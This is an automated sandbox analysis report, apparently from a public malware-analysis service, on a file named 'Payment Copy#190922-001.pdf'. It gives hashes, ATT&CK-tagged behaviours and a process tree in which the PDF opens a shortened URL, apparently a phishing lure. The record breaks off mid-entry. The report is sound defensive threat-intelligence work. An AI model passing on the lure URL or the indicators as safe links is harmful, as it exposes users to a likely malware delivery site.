2f1cc1e2eb21c5a241a75f5781280a6c33234c5b0e41318ad37b4ea80324d270

Analysis

max time kernel
143s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20-09-2022 14:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Copy#190922-001.pdf
Size

246KB
MD5

db926b78737d7f4789f160b57f7659ee
SHA1

69f78005e84a86e9ae4698a7063b7cf7f357700f
SHA256

3171911f4527c4e22b1d2bddf421936d9b63d702b742eba54eb55771844b9f69
SHA512

1f0bc7543fb62e9e391a36576ac2d05f6886a16fb2987ad1464404c3d52b45e3fb0e0d9db61c9c73c558df37cea52c97cd138df81ae62bb0fac402b4f1907487
SSDEEP

6144:pUUtLpXNzMo8Auk55Q/zlk654ARhT7mnBE+Dfq5ql:pUgLpXNzMoQkjQy65/Rx7EC5ql

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220920163123.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\5217341e-833d-4580-855b-c946841a5fd1.tmp	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 4 IoCs

Processes:

msedge.exeOpenWith.exe7zFM.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	7zFM.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exeAcroRd32.exe7zFM.exepowershell.exemsedge.exe

pid	process
1420	msedge.exe
1420	msedge.exe
540	msedge.exe
540	msedge.exe
3136	msedge.exe
3136	msedge.exe
5328	identity_helper.exe
5328	identity_helper.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
5996	7zFM.exe
5996	7zFM.exe
6112	powershell.exe
6112	powershell.exe
6112	powershell.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe
3376	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exe7zFM.exe

pid process

1508 OpenWith.exe
5996 7zFM.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

540 msedge.exe
540 msedge.exe
540 msedge.exe
540 msedge.exe
540 msedge.exe

pid	process
1508	OpenWith.exe
5996	7zFM.exe

pid	process
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

7zFM.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	5996	7zFM.exe
Token: 35	5996	7zFM.exe
Token: SeSecurityPrivilege	5996	7zFM.exe
Token: SeDebugPrivilege	6112	powershell.exe

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

AcroRd32.exemsedge.exe7zFM.exe

pid	process
4624	AcroRd32.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
540	msedge.exe
5996	7zFM.exe
5996	7zFM.exe
5996	7zFM.exe

Suspicious use of SetWindowsHookEx 33 IoCs

Processes:

AcroRd32.exeOpenWith.exe

pid	process
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
4624	AcroRd32.exe
1508	OpenWith.exe
4624	AcroRd32.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe
1508	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AcroRd32.exemsedge.exeRdrCEF.exe

description	pid	process	target process
PID 4624 wrote to memory of 540	4624	AcroRd32.exe	msedge.exe
PID 4624 wrote to memory of 540	4624	AcroRd32.exe	msedge.exe
PID 540 wrote to memory of 3876	540	msedge.exe	msedge.exe
PID 540 wrote to memory of 3876	540	msedge.exe	msedge.exe
PID 4624 wrote to memory of 4160	4624	AcroRd32.exe	RdrCEF.exe
PID 4624 wrote to memory of 4160	4624	AcroRd32.exe	RdrCEF.exe
PID 4624 wrote to memory of 4160	4624	AcroRd32.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 4528	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe
PID 4160 wrote to memory of 3112	4160	RdrCEF.exe	RdrCEF.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Copy#190922-001.pdf"
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://rebrand.ly/d6tbep8paymentcopy
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffb563b46f8,0x7ffb563b4708,0x7ffb563b4718
    3⤵
    PID:3876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
    3⤵
    PID:2352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
    3⤵
    PID:1312
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    3⤵
    PID:2916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
    3⤵
    PID:3004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5048 /prefetch:8
    3⤵
    PID:1576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5540 /prefetch:8
    3⤵
    PID:4888
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5472 /prefetch:8
    3⤵
    PID:1456
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
    3⤵
    PID:3732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
    3⤵
    PID:4256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
    3⤵
    PID:2396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6300 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3136
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8
    3⤵
    PID:364
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
    3⤵
    - Drops file in Program Files directory
    PID:4552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7fae85460,0x7ff7fae85470,0x7ff7fae85480
      4⤵
      PID:4860
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5328
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3848 /prefetch:8
    3⤵
    PID:4948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:8
    3⤵
    PID:3000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3856 /prefetch:8
    3⤵
    PID:4228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2136,4543499159453714501,17870833911218157212,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
    3⤵
    PID:5832
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CE6C5B6DA01F222CD6A28A891ABBECB2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:4528
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7372645E3B6C5DC31CEF4D8195ADF369 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7372645E3B6C5DC31CEF4D8195ADF369 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
    3⤵
    PID:3112
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C8C5AFD6383CF3FD3124C36BE3C11BA6 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    3⤵
    PID:1228
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
